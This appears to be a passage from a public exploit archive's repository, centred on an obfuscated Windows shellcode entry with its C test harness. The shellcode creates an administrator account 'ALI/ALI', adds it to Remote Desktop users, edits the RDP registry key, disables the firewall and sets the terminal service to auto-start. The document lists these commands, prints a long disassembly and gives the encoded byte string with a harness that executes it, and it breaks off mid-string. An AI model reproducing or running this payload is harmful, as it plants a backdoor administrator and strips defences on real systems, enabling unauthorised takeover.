unsigned char shellcode[]= "\x31\xc0\x50\xb8\x41\x41\x41\x64\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x6d\x76\x53\x52\xba\x4d\x59\x32\x36\x31\xd1\x51\xb9\x6e\x72\x61\x71\xba\x4e\x33\x2d\x38\x31\xd1\x51\xb9\x6c\x75\x78\x78\xba\x4c\x34\x34\x31\x31\xd1\x51\xb9\x46\x47\x57\x46\xba\x33\x34\x32\x34\x31\xd1\x51\xb9\x56\x50\x47\x64\xba\x38\x35\x33\x44\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x01\x41\x60\x32\xba\x48\x61\x4f\x53\x31\xd1\x51\xb9\x28\x47\x0d\x2f\xba\x5b\x67\x4c\x63\x31\xd1\x51\xb9\x03\x24\x36\x21\xba\x62\x50\x59\x53\x31\xd1\x51\xb9\x34\x41\x15\x18\xba\x5d\x32\x61\x6a\x31\xd1\x51\xb9\x0c\x05\x1b\x25\xba\x68\x68\x72\x4b\x31\xd1\x51\xb9\x2f\x27\x7b\x13\xba\x5a\x57\x5b\x52\x31\xd1\x51\xb9\x1c\x2c\x02\x3e\xba\x70\x4b\x70\x51\x31\xd1\x51\xb9\x3d\x2a\x32\x4c\xba\x51\x45\x51\x2d\x31\xd1\x51\xb9\x23\x5c\x1c\x19\xba\x4d\x39\x68\x39\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x02\x63\x6b\x35\xba\x4b\x43\x44\x54\x31\xd1\x51\xb9\x61\x55\x6c\x3d\xba\x43\x75\x2d\x71\x31\xd1\x51\xb9\x27\x3f\x3b\x1a\xba\x54\x5a\x49\x69\x31\xd1\x51\xb9\x25\x34\x12\x67\xba\x4a\x44\x32\x32\x31\xd1\x51\xb9\x0b\x02\x1f\x19\xba\x6e\x71\x74\x6d\x31\xd1\x51\xb9\x39\x3f\x7b\x15\xba\x4d\x5a\x5b\x51\x31\xd1\x51\xb9\x35\x15\x03\x2a\xba\x67\x70\x6e\x45\x31\xd1\x51\xb9\x3a\x17\x75\x46\xba\x6f\x47\x55\x64\x31\xd1\x51\xb9\x26\x35\x0b\x1e\xba\x6a\x72\x59\x51\x31\xd1\x51\xb9\x2a\x2a\x06\x2a\xba\x66\x65\x45\x6b\x31\xd1\x51\xb9\x1d\x20\x35\x5a\xba\x53\x65\x61\x7a\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb9\x09\x4c\x7c\x5e\xba\x38\x6c\x53\x38\x31\xd1\x51\xb9\x42\x4d\x39\x14\xba\x62\x62\x5d\x34\x31\xd1\x51\xb9\x7a\x24\x26\x75\xba\x2d\x6b\x74\x31\x31\xd1\x51\xb9\x1d\x30\x15\x28\xba\x58\x77\x4a\x6c\x31\xd1\x51\xb9\x7c\x2f\x57\x16\xba\x53\x5b\x77\x44\x31\xd1\x51\xb9\x42\x25\x2a\x66\xba\x2d\x4b\x59\x46\x31\xd1\x51\xb9\x28\x2f\x0c\x5a\xba\x4d\x4c\x78\x33\x31\xd1\x51\xb9\x20\x2b\x26\x26\xba\x63\x44\x48\x48\x31\xd1\x51\xb9\x08\x2b\x23\x67\xba\x66\x52\x77\x34\x31\xd1\x51\xb9\x49\x1c\x2e\x48\xba\x69\x7a\x6a\x2d\x31\xd1\x51\xb9\x67\x67\x1d\x37\xba\x45\x47\x32\x41\x31\xd1\x51\xb9\x03\x33\x0d\x3b\xba\x71\x45\x68\x49\x31\xd1\x51\xb9\x39\x6a\x3c\x2f\xba\x55\x4a\x6f\x4a\x31\xd1\x51\xb9\x37\x44\x1f\x2e\xba\x5a\x2d\x71\x4f\x31\xd1\x51\xb9\x34\x23\x23\x3b\xba\x68\x77\x46\x49\x31\xd1\x51\xb9\x07\x3a\x0a\x14\xba\x73\x48\x65\x78\x31\xd1\x51\xb9\x14\x2e\x58\x53\xba\x48\x6d\x37\x3d\x31\xd1\x51\xb9\x3e\x3d\x26\x32\xba\x52\x6e\x43\x46\x31\xd1\x51\xb9\x33\x3c\x35\x34\xba\x5d\x48\x47\x5b\x31\xd1\x51\xb9\x36\x0e\x07\x2b\xba\x58\x7a\x44\x44\x31\xd1\x51\xb9\x3c\x10\x0a\x37\xba\x49\x62\x78\x52\x31\xd1\x51\xb9\x24\x7c\x3b\x36\xba\x61\x31\x67\x75\x31\xd1\x51\xb9\x31\x3d\x3b\x27\xba\x62\x64\x68\x73\x31\xd1\x51\xb9\x7f\x7d\x3d\x35\xba\x36\x33\x78\x69\x31\xd1\x51\xb9\x7c\x13\x0f\x2f\xba\x31\x52\x4c\x67\x31\xd1\x51\xb9\x1b\x08\x35\x2d\xba\x58\x49\x79\x72\x31\xd1\x51\xb9\x74\x3a\x1e\x21\xba\x2d\x65\x52\x6e\x31\xd1\x51\xb9\x16\x10\x1f\x17\xba\x34\x58\x54\x52\x31\xd1\x51\xb9\x2f\x27\x0c\x6e\xba\x4e\x43\x68\x4e\x31\xd1\x51\xb9\x39\x22\x5e\x50\xba\x4b\x47\x39\x70\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x65\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x1e\x53\x39\x3c\xba\x6d\x32\x5b\x50\x31\xd1\x51\xb9\x04\x66\x2f\x32\xba\x61\x46\x4b\x5b\x31\xd1\x51\xb9\x19\x1e\x0d\x11\xba\x69\x73\x62\x75\x31\xd1\x51\xb9\x20\x41\x47\x36\xba\x45\x35\x67\x59\x31\xd1\x51\xb9\x2b\x05\x64\x2a\xba\x47\x69\x44\x59\x31\xd1\x51\xb9\x10\x3f\x4f\x22\xba\x62\x5a\x38\x43\x31\xd1\x51\xb9\x2a\x6f\x2a\x24\xba\x42\x4f\x4c\x4d\x31\xd1\x51\xb9\x29\x09\x1e\x5e\xba\x47\x6c\x6a\x2d\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x6f\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x72\x2a\x05\x39\xba\x52\x4b\x70\x4d\x31\xd1\x51\xb9\x54\x3a\x05\x52\xba\x35\x48\x71\x6f\x31\xd1\x51\xb9\x29\x16\x0a\x47\xba\x4c\x36\x79\x33\x31\xd1\x51\xb9\x27\x1b\x5b\x3e\xba\x55\x6d\x32\x5d\x31\xd1\x51\xb9\x33\x1a\x3b\x10\xba\x41\x77\x48\x75\x31\xd1\x51\xb9\x34\x79\x3a\x12\xba\x53\x59\x4e\x77\x31\xd1\x51\xb9\x1d\x5c\x1e\x28\xba\x72\x32\x78\x41\x31\xd1\x51\xb9\x2a\x4e\x5a\x28\xba\x59\x2d\x7a\x4b\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\xbb\xf9\x7e\x5e\x22\xba\x36\x54\x3d\x54\x31\xd3\xff\xd3";
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}

440
platforms/win64/shellcode/35794.txt Executable file
View file

@ -0,0 +1,440 @@
#Author: Ali Razmjoo
? ?#Title: ?Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
Obfuscated Shellcode Windows x64 [1218 Bytes].c
/*
#Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
#length: 1218 bytes
#Date: 13 January 2015
#Author: Ali Razmjoo
#tested On: Windows 7 x64 ultimate
WinExec => 0x769e2c91
ExitProcess => 0x769679f8
====================================
Execute :
net user ALI ALI /add
net localgroup Administrators ALI /add
NET LOCALGROUP "Remote Desktop Users" ALI /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
netsh firewall set opmode disable
sc config termservice start= auto
====================================
Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com']
Thanks to my friends , Dariush Nasirpour and Ehsan Nezami
C:\Users\Ali\Desktop>objdump -D shellcode.o
shellcode.o: file format elf32-i386
Disassembly of section .text:
00000000 <.text>:
0: 31 c0 xor %eax,%eax
2: 50 push %eax
3: b8 41 41 41 64 mov $0x64414141,%eax
8: c1 e8 08 shr $0x8,%eax
b: c1 e8 08 shr $0x8,%eax
e: c1 e8 08 shr $0x8,%eax
11: 50 push %eax
12: b9 6d 76 53 52 mov $0x5253766d,%ecx
17: ba 4d 59 32 36 mov $0x3632594d,%edx
1c: 31 d1 xor %edx,%ecx
1e: 51 push %ecx
1f: b9 6e 72 61 71 mov $0x7161726e,%ecx
24: ba 4e 33 2d 38 mov $0x382d334e,%edx
29: 31 d1 xor %edx,%ecx
2b: 51 push %ecx
2c: b9 6c 75 78 78 mov $0x7878756c,%ecx
31: ba 4c 34 34 31 mov $0x3134344c,%edx
36: 31 d1 xor %edx,%ecx
38: 51 push %ecx
39: b9 46 47 57 46 mov $0x46574746,%ecx
3e: ba 33 34 32 34 mov $0x34323433,%edx
43: 31 d1 xor %edx,%ecx
45: 51 push %ecx
46: b9 56 50 47 64 mov $0x64475056,%ecx
4b: ba 38 35 33 44 mov $0x44333538,%edx
50: 31 d1 xor %edx,%ecx
52: 51 push %ecx
53: 89 e0 mov %esp,%eax
55: bb 41 41 41 01 mov $0x1414141,%ebx
5a: c1 eb 08 shr $0x8,%ebx
5d: c1 eb 08 shr $0x8,%ebx
60: c1 eb 08 shr $0x8,%ebx
63: 53 push %ebx
64: 50 push %eax
65: bb dc 7a a8 23 mov $0x23a87adc,%ebx
6a: ba 4d 56 36 55 mov $0x5536564d,%edx
6f: 31 d3 xor %edx,%ebx
71: ff d3 call *%ebx
73: 31 c0 xor %eax,%eax
75: 50 push %eax
76: 68 41 41 64 64 push $0x64644141
7b: 58 pop %eax
7c: c1 e8 08 shr $0x8,%eax
7f: c1 e8 08 shr $0x8,%eax
82: 50 push %eax
83: b9 01 41 60 32 mov $0x32604101,%ecx
88: ba 48 61 4f 53 mov $0x534f6148,%edx
8d: 31 d1 xor %edx,%ecx
8f: 51 push %ecx
90: b9 28 47 0d 2f mov $0x2f0d4728,%ecx
95: ba 5b 67 4c 63 mov $0x634c675b,%edx
9a: 31 d1 xor %edx,%ecx
9c: 51 push %ecx
9d: b9 03 24 36 21 mov $0x21362403,%ecx
a2: ba 62 50 59 53 mov $0x53595062,%edx
a7: 31 d1 xor %edx,%ecx
a9: 51 push %ecx
aa: b9 34 41 15 18 mov $0x18154134,%ecx
af: ba 5d 32 61 6a mov $0x6a61325d,%edx
b4: 31 d1 xor %edx,%ecx
b6: 51 push %ecx
b7: b9 0c 05 1b 25 mov $0x251b050c,%ecx
bc: ba 68 68 72 4b mov $0x4b726868,%edx
c1: 31 d1 xor %edx,%ecx
c3: 51 push %ecx
c4: b9 2f 27 7b 13 mov $0x137b272f,%ecx
c9: ba 5a 57 5b 52 mov $0x525b575a,%edx
ce: 31 d1 xor %edx,%ecx
d0: 51 push %ecx
d1: b9 1c 2c 02 3e mov $0x3e022c1c,%ecx
d6: ba 70 4b 70 51 mov $0x51704b70,%edx
db: 31 d1 xor %edx,%ecx
dd: 51 push %ecx
de: b9 3d 2a 32 4c mov $0x4c322a3d,%ecx
e3: ba 51 45 51 2d mov $0x2d514551,%edx
e8: 31 d1 xor %edx,%ecx
ea: 51 push %ecx
eb: b9 23 5c 1c 19 mov $0x191c5c23,%ecx
f0: ba 4d 39 68 39 mov $0x3968394d,%edx
f5: 31 d1 xor %edx,%ecx
f7: 51 push %ecx
f8: 89 e0 mov %esp,%eax
fa: bb 41 41 41 01 mov $0x1414141,%ebx
ff: c1 eb 08 shr $0x8,%ebx
102: c1 eb 08 shr $0x8,%ebx
105: c1 eb 08 shr $0x8,%ebx
108: 53 push %ebx
109: 50 push %eax
10a: bb dc 7a a8 23 mov $0x23a87adc,%ebx
10f: ba 4d 56 36 55 mov $0x5536564d,%edx
114: 31 d3 xor %edx,%ebx
116: ff d3 call *%ebx
118: 31 c0 xor %eax,%eax
11a: 50 push %eax
11b: 68 41 41 64 64 push $0x64644141
120: 58 pop %eax
121: c1 e8 08 shr $0x8,%eax
124: c1 e8 08 shr $0x8,%eax
127: 50 push %eax
128: b9 02 63 6b 35 mov $0x356b6302,%ecx
12d: ba 4b 43 44 54 mov $0x5444434b,%edx
132: 31 d1 xor %edx,%ecx
134: 51 push %ecx
135: b9 61 55 6c 3d mov $0x3d6c5561,%ecx
13a: ba 43 75 2d 71 mov $0x712d7543,%edx
13f: 31 d1 xor %edx,%ecx
141: 51 push %ecx
142: b9 27 3f 3b 1a mov $0x1a3b3f27,%ecx
147: ba 54 5a 49 69 mov $0x69495a54,%edx
14c: 31 d1 xor %edx,%ecx
14e: 51 push %ecx
14f: b9 25 34 12 67 mov $0x67123425,%ecx
154: ba 4a 44 32 32 mov $0x3232444a,%edx
159: 31 d1 xor %edx,%ecx
15b: 51 push %ecx
15c: b9 0b 02 1f 19 mov $0x191f020b,%ecx
161: ba 6e 71 74 6d mov $0x6d74716e,%edx
166: 31 d1 xor %edx,%ecx
168: 51 push %ecx
169: b9 39 3f 7b 15 mov $0x157b3f39,%ecx
16e: ba 4d 5a 5b 51 mov $0x515b5a4d,%edx
173: 31 d1 xor %edx,%ecx
175: 51 push %ecx
176: b9 35 15 03 2a mov $0x2a031535,%ecx
17b: ba 67 70 6e 45 mov $0x456e7067,%edx
180: 31 d1 xor %edx,%ecx
182: 51 push %ecx
183: b9 3a 17 75 46 mov $0x4675173a,%ecx
188: ba 6f 47 55 64 mov $0x6455476f,%edx
18d: 31 d1 xor %edx,%ecx
18f: 51 push %ecx
190: b9 26 35 0b 1e mov $0x1e0b3526,%ecx
195: ba 6a 72 59 51 mov $0x5159726a,%edx
19a: 31 d1 xor %edx,%ecx
19c: 51 push %ecx
19d: b9 2a 2a 06 2a mov $0x2a062a2a,%ecx
1a2: ba 66 65 45 6b mov $0x6b456566,%edx
1a7: 31 d1 xor %edx,%ecx
1a9: 51 push %ecx
1aa: b9 1d 20 35 5a mov $0x5a35201d,%ecx
1af: ba 53 65 61 7a mov $0x7a616553,%edx
1b4: 31 d1 xor %edx,%ecx
1b6: 51 push %ecx
1b7: 89 e0 mov %esp,%eax
1b9: bb 41 41 41 01 mov $0x1414141,%ebx
1be: c1 eb 08 shr $0x8,%ebx
1c1: c1 eb 08 shr $0x8,%ebx
1c4: c1 eb 08 shr $0x8,%ebx
1c7: 53 push %ebx
1c8: 50 push %eax
1c9: bb dc 7a a8 23 mov $0x23a87adc,%ebx
1ce: ba 4d 56 36 55 mov $0x5536564d,%edx
1d3: 31 d3 xor %edx,%ebx
1d5: ff d3 call *%ebx
1d7: 31 c0 xor %eax,%eax
1d9: 50 push %eax
1da: b9 09 4c 7c 5e mov $0x5e7c4c09,%ecx
1df: ba 38 6c 53 38 mov $0x38536c38,%edx
1e4: 31 d1 xor %edx,%ecx
1e6: 51 push %ecx
1e7: b9 42 4d 39 14 mov $0x14394d42,%ecx
1ec: ba 62 62 5d 34 mov $0x345d6262,%edx
1f1: 31 d1 xor %edx,%ecx
1f3: 51 push %ecx
1f4: b9 7a 24 26 75 mov $0x7526247a,%ecx
1f9: ba 2d 6b 74 31 mov $0x31746b2d,%edx
1fe: 31 d1 xor %edx,%ecx
200: 51 push %ecx
201: b9 1d 30 15 28 mov $0x2815301d,%ecx
206: ba 58 77 4a 6c mov $0x6c4a7758,%edx
20b: 31 d1 xor %edx,%ecx
20d: 51 push %ecx
20e: b9 7c 2f 57 16 mov $0x16572f7c,%ecx
213: ba 53 5b 77 44 mov $0x44775b53,%edx
218: 31 d1 xor %edx,%ecx
21a: 51 push %ecx
21b: b9 42 25 2a 66 mov $0x662a2542,%ecx
220: ba 2d 4b 59 46 mov $0x46594b2d,%edx
225: 31 d1 xor %edx,%ecx
227: 51 push %ecx
228: b9 28 2f 0c 5a mov $0x5a0c2f28,%ecx
22d: ba 4d 4c 78 33 mov $0x33784c4d,%edx
232: 31 d1 xor %edx,%ecx
234: 51 push %ecx
235: b9 20 2b 26 26 mov $0x26262b20,%ecx
23a: ba 63 44 48 48 mov $0x48484463,%edx
23f: 31 d1 xor %edx,%ecx
241: 51 push %ecx
242: b9 08 2b 23 67 mov $0x67232b08,%ecx
247: ba 66 52 77 34 mov $0x34775266,%edx
24c: 31 d1 xor %edx,%ecx
24e: 51 push %ecx
24f: b9 49 1c 2e 48 mov $0x482e1c49,%ecx
254: ba 69 7a 6a 2d mov $0x2d6a7a69,%edx
259: 31 d1 xor %edx,%ecx
25b: 51 push %ecx
25c: b9 67 67 1d 37 mov $0x371d6767,%ecx
261: ba 45 47 32 41 mov $0x41324745,%edx
266: 31 d1 xor %edx,%ecx
268: 51 push %ecx
269: b9 03 33 0d 3b mov $0x3b0d3303,%ecx
26e: ba 71 45 68 49 mov $0x49684571,%edx
273: 31 d1 xor %edx,%ecx
275: 51 push %ecx
276: b9 39 6a 3c 2f mov $0x2f3c6a39,%ecx
27b: ba 55 4a 6f 4a mov $0x4a6f4a55,%edx
280: 31 d1 xor %edx,%ecx
282: 51 push %ecx
283: b9 37 44 1f 2e mov $0x2e1f4437,%ecx
288: ba 5a 2d 71 4f mov $0x4f712d5a,%edx
28d: 31 d1 xor %edx,%ecx
28f: 51 push %ecx
290: b9 34 23 23 3b mov $0x3b232334,%ecx
295: ba 68 77 46 49 mov $0x49467768,%edx
29a: 31 d1 xor %edx,%ecx
29c: 51 push %ecx
29d: b9 07 3a 0a 14 mov $0x140a3a07,%ecx
2a2: ba 73 48 65 78 mov $0x78654873,%edx
2a7: 31 d1 xor %edx,%ecx
2a9: 51 push %ecx
2aa: b9 14 2e 58 53 mov $0x53582e14,%ecx
2af: ba 48 6d 37 3d mov $0x3d376d48,%edx
2b4: 31 d1 xor %edx,%ecx
2b6: 51 push %ecx
2b7: b9 3e 3d 26 32 mov $0x32263d3e,%ecx
2bc: ba 52 6e 43 46 mov $0x46436e52,%edx
2c1: 31 d1 xor %edx,%ecx
2c3: 51 push %ecx
2c4: b9 33 3c 35 34 mov $0x34353c33,%ecx
2c9: ba 5d 48 47 5b mov $0x5b47485d,%edx
2ce: 31 d1 xor %edx,%ecx
2d0: 51 push %ecx
2d1: b9 36 0e 07 2b mov $0x2b070e36,%ecx
2d6: ba 58 7a 44 44 mov $0x44447a58,%edx
2db: 31 d1 xor %edx,%ecx
2dd: 51 push %ecx
2de: b9 3c 10 0a 37 mov $0x370a103c,%ecx
2e3: ba 49 62 78 52 mov $0x52786249,%edx
2e8: 31 d1 xor %edx,%ecx
2ea: 51 push %ecx
2eb: b9 24 7c 3b 36 mov $0x363b7c24,%ecx
2f0: ba 61 31 67 75 mov $0x75673161,%edx
2f5: 31 d1 xor %edx,%ecx
2f7: 51 push %ecx
2f8: b9 31 3d 3b 27 mov $0x273b3d31,%ecx
2fd: ba 62 64 68 73 mov $0x73686462,%edx
302: 31 d1 xor %edx,%ecx
304: 51 push %ecx
305: b9 7f 7d 3d 35 mov $0x353d7d7f,%ecx
30a: ba 36 33 78 69 mov $0x69783336,%edx
30f: 31 d1 xor %edx,%ecx
311: 51 push %ecx
312: b9 7c 13 0f 2f mov $0x2f0f137c,%ecx
317: ba 31 52 4c 67 mov $0x674c5231,%edx
31c: 31 d1 xor %edx,%ecx
31e: 51 push %ecx
31f: b9 1b 08 35 2d mov $0x2d35081b,%ecx
324: ba 58 49 79 72 mov $0x72794958,%edx
329: 31 d1 xor %edx,%ecx
32b: 51 push %ecx
32c: b9 74 3a 1e 21 mov $0x211e3a74,%ecx
331: ba 2d 65 52 6e mov $0x6e52652d,%edx
336: 31 d1 xor %edx,%ecx
338: 51 push %ecx
339: b9 16 10 1f 17 mov $0x171f1016,%ecx
33e: ba 34 58 54 52 mov $0x52545834,%edx
343: 31 d1 xor %edx,%ecx
345: 51 push %ecx
346: b9 2f 27 0c 6e mov $0x6e0c272f,%ecx
34b: ba 4e 43 68 4e mov $0x4e68434e,%edx
350: 31 d1 xor %edx,%ecx
352: 51 push %ecx
353: b9 39 22 5e 50 mov $0x505e2239,%ecx
358: ba 4b 47 39 70 mov $0x7039474b,%edx
35d: 31 d1 xor %edx,%ecx
35f: 51 push %ecx
360: 89 e0 mov %esp,%eax
362: bb 41 41 41 01 mov $0x1414141,%ebx
367: c1 eb 08 shr $0x8,%ebx
36a: c1 eb 08 shr $0x8,%ebx
36d: c1 eb 08 shr $0x8,%ebx
370: 53 push %ebx
371: 50 push %eax
372: bb dc 7a a8 23 mov $0x23a87adc,%ebx
377: ba 4d 56 36 55 mov $0x5536564d,%edx
37c: 31 d3 xor %edx,%ebx
37e: ff d3 call *%ebx
380: 31 c0 xor %eax,%eax
382: 50 push %eax
383: b8 41 41 41 65 mov $0x65414141,%eax
388: c1 e8 08 shr $0x8,%eax
38b: c1 e8 08 shr $0x8,%eax
38e: c1 e8 08 shr $0x8,%eax
391: 50 push %eax
392: b9 1e 53 39 3c mov $0x3c39531e,%ecx
397: ba 6d 32 5b 50 mov $0x505b326d,%edx
39c: 31 d1 xor %edx,%ecx
39e: 51 push %ecx
39f: b9 04 66 2f 32 mov $0x322f6604,%ecx
3a4: ba 61 46 4b 5b mov $0x5b4b4661,%edx
3a9: 31 d1 xor %edx,%ecx
3ab: 51 push %ecx
3ac: b9 19 1e 0d 11 mov $0x110d1e19,%ecx
3b1: ba 69 73 62 75 mov $0x75627369,%edx
3b6: 31 d1 xor %edx,%ecx
3b8: 51 push %ecx
3b9: b9 20 41 47 36 mov $0x36474120,%ecx
3be: ba 45 35 67 59 mov $0x59673545,%edx
3c3: 31 d1 xor %edx,%ecx
3c5: 51 push %ecx
3c6: b9 2b 05 64 2a mov $0x2a64052b,%ecx
3cb: ba 47 69 44 59 mov $0x59446947,%edx
3d0: 31 d1 xor %edx,%ecx
3d2: 51 push %ecx
3d3: b9 10 3f 4f 22 mov $0x224f3f10,%ecx
3d8: ba 62 5a 38 43 mov $0x43385a62,%edx
3dd: 31 d1 xor %edx,%ecx
3df: 51 push %ecx
3e0: b9 2a 6f 2a 24 mov $0x242a6f2a,%ecx
3e5: ba 42 4f 4c 4d mov $0x4d4c4f42,%edx
3ea: 31 d1 xor %edx,%ecx
3ec: 51 push %ecx
3ed: b9 29 09 1e 5e mov $0x5e1e0929,%ecx
3f2: ba 47 6c 6a 2d mov $0x2d6a6c47,%edx
3f7: 31 d1 xor %edx,%ecx
3f9: 51 push %ecx
3fa: 89 e0 mov %esp,%eax
3fc: bb 41 41 41 01 mov $0x1414141,%ebx
401: c1 eb 08 shr $0x8,%ebx
404: c1 eb 08 shr $0x8,%ebx
407: c1 eb 08 shr $0x8,%ebx
40a: 53 push %ebx
40b: 50 push %eax
40c: bb dc 7a a8 23 mov $0x23a87adc,%ebx
411: ba 4d 56 36 55 mov $0x5536564d,%edx
416: 31 d3 xor %edx,%ebx
418: ff d3 call *%ebx
41a: 31 c0 xor %eax,%eax
41c: 50 push %eax
41d: b8 41 41 41 6f mov $0x6f414141,%eax
422: c1 e8 08 shr $0x8,%eax
425: c1 e8 08 shr $0x8,%eax
428: c1 e8 08 shr $0x8,%eax
42b: 50 push %eax
42c: b9 72 2a 05 39 mov $0x39052a72,%ecx
431: ba 52 4b 70 4d mov $0x4d704b52,%edx
436: 31 d1 xor %edx,%ecx
438: 51 push %ecx
439: b9 54 3a 05 52 mov $0x52053a54,%ecx
43e: ba 35 48 71 6f mov $0x6f714835,%edx
443: 31 d1 xor %edx,%ecx
445: 51 push %ecx
446: b9 29 16 0a 47 mov $0x470a1629,%ecx
44b: ba 4c 36 79 33 mov $0x3379364c,%edx
450: 31 d1 xor %edx,%ecx
452: 51 push %ecx
453: b9 27 1b 5b 3e mov $0x3e5b1b27,%ecx
458: ba 55 6d 32 5d mov $0x5d326d55,%edx
45d: 31 d1 xor %edx,%ecx
45f: 51 push %ecx
460: b9 33 1a 3b 10 mov $0x103b1a33,%ecx
465: ba 41 77 48 75 mov $0x75487741,%edx
46a: 31 d1 xor %edx,%ecx
46c: 51 push %ecx
46d: b9 34 79 3a 12 mov $0x123a7934,%ecx
472: ba 53 59 4e 77 mov $0x774e5953,%edx
477: 31 d1 xor %edx,%ecx
479: 51 push %ecx
47a: b9 1d 5c 1e 28 mov $0x281e5c1d,%ecx
47f: ba 72 32 78 41 mov $0x41783272,%edx
484: 31 d1 xor %edx,%ecx
486: 51 push %ecx
487: b9 2a 4e 5a 28 mov $0x285a4e2a,%ecx
48c: ba 59 2d 7a 4b mov $0x4b7a2d59,%edx
491: 31 d1 xor %edx,%ecx
493: 51 push %ecx
494: 89 e0 mov %esp,%eax
496: bb 41 41 41 01 mov $0x1414141,%ebx
49b: c1 eb 08 shr $0x8,%ebx
49e: c1 eb 08 shr $0x8,%ebx
4a1: c1 eb 08 shr $0x8,%ebx
4a4: 53 push %ebx
4a5: 50 push %eax
4a6: bb dc 7a a8 23 mov $0x23a87adc,%ebx
4ab: ba 4d 56 36 55 mov $0x5536564d,%edx
4b0: 31 d3 xor %edx,%ebx
4b2: ff d3 call *%ebx
4b4: bb 9b 4f d0 30 mov $0x30d04f9b,%ebx
4b9: ba 63 36 46 46 mov $0x46463663,%edx
4be: 31 d3 xor %edx,%ebx
4c0: ff d3 call *%ebx
*/
#include <stdio.h>
#include <string.h>
int main(){
unsigned char shellcode[]= "\x31\xc0\x50\xb8\x41\x41\x41\x64\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x6d\x76\x53\x52\xba\x4d\x59\x32\x36\x31\xd1\x51\xb9\x6e\x72\x61\x71\xba\x4e\x33\x2d\x38\x31\xd1\x51\xb9\x6c\x75\x78\x78\xba\x4c\x34\x34\x31\x31\xd1\x51\xb9\x46\x47\x57\x46\xba\x33\x34\x32\x34\x31\xd1\x51\xb9\x56\x50\x47\x64\xba\x38\x35\x33\x44\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x01\x41\x60\x32\xba\x48\x61\x4f\x53\x31\xd1\x51\xb9\x28\x47\x0d\x2f\xba\x5b\x67\x4c\x63\x31\xd1\x51\xb9\x03\x24\x36\x21\xba\x62\x50\x59\x53\x31\xd1\x51\xb9\x34\x41\x15\x18\xba\x5d\x32\x61\x6a\x31\xd1\x51\xb9\x0c\x05\x1b\x25\xba\x68\x68\x72\x4b\x31\xd1\x51\xb9\x2f\x27\x7b\x13\xba\x5a\x57\x5b\x52\x31\xd1\x51\xb9\x1c\x2c\x02\x3e\xba\x70\x4b\x70\x51\x31\xd1\x51\xb9\x3d\x2a\x32\x4c\xba\x51\x45\x51\x2d\x31\xd1\x51\xb9\x23\x5c\x1c\x19\xba\x4d\x39\x68\x39\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x02\x63\x6b\x35\xba\x4b\x43\x44\x54\x31\xd1\x51\xb9\x61\x55\x6c\x3d\xba\x43\x75\x2d\x71\x31\xd1\x51\xb9\x27\x3f\x3b\x1a\xba\x54\x5a\x49\x69\x31\xd1\x51\xb9\x25\x34\x12\x67\xba\x4a\x44\x32\x32\x31\xd1\x51\xb9\x0b\x02\x1f\x19\xba\x6e\x71\x74\x6d\x31\xd1\x51\xb9\x39\x3f\x7b\x15\xba\x4d\x5a\x5b\x51\x31\xd1\x51\xb9\x35\x15\x03\x2a\xba\x67\x70\x6e\x45\x31\xd1\x51\xb9\x3a\x17\x75\x46\xba\x6f\x47\x55\x64\x31\xd1\x51\xb9\x26\x35\x0b\x1e\xba\x6a\x72\x59\x51\x31\xd1\x51\xb9\x2a\x2a\x06\x2a\xba\x66\x65\x45\x6b\x31\xd1\x51\xb9\x1d\x20\x35\x5a\xba\x53\x65\x